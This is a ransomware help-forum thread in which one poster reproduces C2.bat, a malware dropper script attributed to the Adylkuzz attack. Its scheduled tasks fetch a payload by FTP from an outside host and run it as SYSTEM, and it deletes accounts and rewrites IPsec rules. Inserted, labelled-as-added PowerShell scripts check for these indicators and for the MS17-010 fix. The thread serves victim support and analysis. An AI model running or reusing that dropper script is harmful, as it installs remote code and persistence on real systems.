
Ransomware Help


3 replies to this topic

#1 cungcapcaphe (Members, 4 posts)

Posted 21 June 2017 - 07:01 PM

I reinstall Windows ...

7 days

1.png

2.png





#2 Demonslay335 (Ransomware Hunter, Security Colleague, 3,426 posts, USA)

Posted 21 June 2017 - 07:05 PM

We'll need more information than that. The URL in your screenshots is down, so I cannot download the malware to check it out.

 

Were your files encrypted? Have you submitted an encrypted file and ransom note to ID Ransomware for identification?


ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

CryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#3 al1963 (Members, 882 posts)

Posted 21 June 2017 - 11:06 PM

Here is C2.bat, the trace from the Adylkuzz attack, about this:


ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del C:\WINDOWS\Debug\c2.bat
exit


Probably there was also a WMI infection in the system.
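A read-only triage script for the artifacts named in the C2.bat trace above, added here as an example; it is not from the thread or from any of the posters. It checks for the Mysa1/Mysa2 scheduled tasks, the dropped file paths, rundll32 running item.dat, system-named binaries (csrss.exe, svchost.exe, winlogon.exe) launched from outside System32, the legacy IPsec policy "win", and WMI permanent event subscriptions, which is where the "WMI infection" the poster suspects would live. Task names and paths are taken verbatim from the trace; the structure, regexes and messages are this example's own assumptions.

```powershell
# Added triage script (not from the thread). Read-only: it reports and removes nothing.
# Indicators are the ones visible in the C2.bat trace; run from an elevated prompt.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Scheduled tasks the script creates (schtasks is available back to XP)
foreach ($taskName in 'Mysa1', 'Mysa2') {
    $null = schtasks /query /tn $taskName 2>$null
    if ($LASTEXITCODE -eq 0) { $findings.Add("Scheduled task present: $taskName") }
}

# 2. Files the script drops, locks down with cacls, or deletes afterwards
$dropPaths = @(
    'C:\Windows\debug\item.dat',
    'C:\Windows\debug\c2.bat',
    'C:\Windows\twain_32\csrss.exe',
    'C:\Windows\twain_32\svchost.exe',
    'C:\Windows\tasks\csrss.exe',
    'C:\Windows\system\winlogon.exe',
    'C:\Windows\system\svchost.exe'
)
foreach ($path in $dropPaths) {
    if (Test-Path -LiteralPath $path) {
        $hash = 'n/a'   # Get-FileHash needs PowerShell 4+; report without a hash on older hosts
        try { $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash } catch { }
        $findings.Add("File present: $path (SHA256 $hash)")
    }
}

# 3. The Mysa1 payload: rundll32 loading item.dat
Get-WmiObject -Class Win32_Process -Filter "Name='rundll32.exe'" |
    Where-Object { $_.CommandLine -match 'item\.dat' } |
    ForEach-Object { $findings.Add("rundll32 loading item.dat: PID $($_.ProcessId) $($_.CommandLine)") }

# 4. System-named processes running from outside System32/SysWOW64 (as in the Wmic lines)
$legitDir = "^$([regex]::Escape($env:SystemRoot))\\(System32|SysWOW64)\\"
Get-WmiObject -Class Win32_Process |
    Where-Object { ('csrss.exe', 'svchost.exe', 'winlogon.exe') -contains $_.Name -and
                   $_.ExecutablePath -and $_.ExecutablePath -notmatch $legitDir } |
    ForEach-Object { $findings.Add("System-named process from odd path: $($_.ExecutablePath) (PID $($_.ProcessId))") }

# 5. Legacy IPsec policy "win" (blocks inbound 135/137/138/139/445 in the trace).
#    These static policies do not appear in Windows Firewall with Advanced Security.
$ipsec = (netsh ipsec static show policy all 2>&1) -join "`n"
if ($ipsec -match '(?m)^\s*Policy Name\s*:\s*win\s*$') {
    $findings.Add('Legacy IPsec policy "win" is defined (check with: netsh ipsec static show policy name=win)')
}

# 6. WMI permanent event subscriptions: filters, script/command consumers, bindings
$ns = 'root\subscription'
Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("WMI event filter: $($_.Name) [$($_.Query)]") }
$consumers = @(Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -ErrorAction SilentlyContinue) +
             @(Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
foreach ($c in $consumers) {
    $detail = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { "$($c.ScriptText)" }
    if ($detail.Length -gt 160) { $detail = $detail.Substring(0, 160) + '...' }
    $findings.Add("WMI event consumer: $($c.Name) -> $detail")
}
Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("WMI binding: $($_.Filter) -> $($_.Consumer)") }

# Report
if ($findings.Count -eq 0) {
    Write-Output 'None of the C2.bat indicators were found (this rules out only what was checked here).'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Two things to keep in mind when reading the output: the "SCM Event Log Filter" / "SCM Event Log Consumer" pair is present by default on Windows 7 and later and is not a finding by itself, while any CommandLineEventConsumer or ActiveScriptEventConsumer on an ordinary workstation deserves a look. Also, the IPsec policy blocks inbound SMB ports, so a port scan of an infected host can look clean even though the miner and its scheduled tasks are still there; absence of open 445 is not evidence of a clean system.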



#4 thyrex (Members, 526 posts, Belarus)

Posted 22 June 2017 - 01:20 AM

First, you need to install the MS17-010 Critical Fix


Microsoft MVP 2012-2016 Consumer Security

Microsoft Reconnect 2016
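To go with the advice in the post above, here is an added check (not from the thread or from Microsoft) that reports whether one of the MS17-010 updates is installed on the host and whether the SMBv1 server is still enabled. The KB numbers are the ones Microsoft published with MS17-010 in March 2017 and the May 2017 out-of-band release for XP/2003/Vista/2008/Windows 8; the function names, the registry reading and the messages are this example's own.

```powershell
# Added example (not from the thread). Read-only.
# Later cumulative updates supersede these KBs, so on an up-to-date host none of them
# may be listed even though the fix is present: treat "not found" as "verify via
# Windows Update", not as a verdict that the host is exposed.
$ms17010Kbs = @{
    'KB4012598' = 'Windows XP / Server 2003 / Vista / Server 2008 / Windows 8'
    'KB4012212' = 'Windows 7 / Server 2008 R2 (security-only)'
    'KB4012215' = 'Windows 7 / Server 2008 R2 (monthly rollup)'
    'KB4012214' = 'Windows Server 2012 (security-only)'
    'KB4012217' = 'Windows Server 2012 (monthly rollup)'
    'KB4012213' = 'Windows 8.1 / Server 2012 R2 (security-only)'
    'KB4012216' = 'Windows 8.1 / Server 2012 R2 (monthly rollup)'
    'KB4012606' = 'Windows 10 1507'
    'KB4013198' = 'Windows 10 1511'
    'KB4013429' = 'Windows 10 1607 / Server 2016'
}

function Get-Ms17010Status {
    # Get-HotFix reads Win32_QuickFixEngineering, which lists installed KBs
    $installed = @(Get-HotFix -ErrorAction SilentlyContinue | ForEach-Object { $_.HotFixID })
    $hits = @($ms17010Kbs.Keys | Where-Object { $installed -contains $_ })
    if ($hits.Count -gt 0) {
        foreach ($kb in $hits) { "MS17-010 update present: $kb ($($ms17010Kbs[$kb]))" }
    } else {
        "No MS17-010 KB among $($installed.Count) installed hotfixes; confirm through Windows Update"
    }
}

function Get-Smb1Status {
    # SMB1 = 0 under LanmanServer\Parameters disables the SMBv1 server; an absent
    # value means the OS default applies (enabled on Windows 7/8/2012 and older).
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $smb1 = (Get-ItemProperty -Path $params -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $smb1) {
        'SMBv1 server: no SMB1 registry value, OS default applies (enabled on older Windows)'
    } elseif ($smb1 -eq 0) {
        'SMBv1 server: disabled (SMB1 = 0)'
    } else {
        "SMBv1 server: enabled (SMB1 = $smb1)"
    }
    # On Windows 8/10 and Server 2012+, the optional feature state is the authoritative answer
    if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
        $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
        if ($feature) { "SMB1Protocol optional feature: $($feature.State)" }
    }
}

Get-Ms17010Status
Get-Smb1Status
```

Run it from an elevated prompt (the optional-feature query needs it). Installing the fix closes the SMBv1 hole used to get in; disabling SMBv1 where nothing depends on it removes the attack surface entirely, and the registry value is the switch that works on the older Windows versions this thread concerns.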




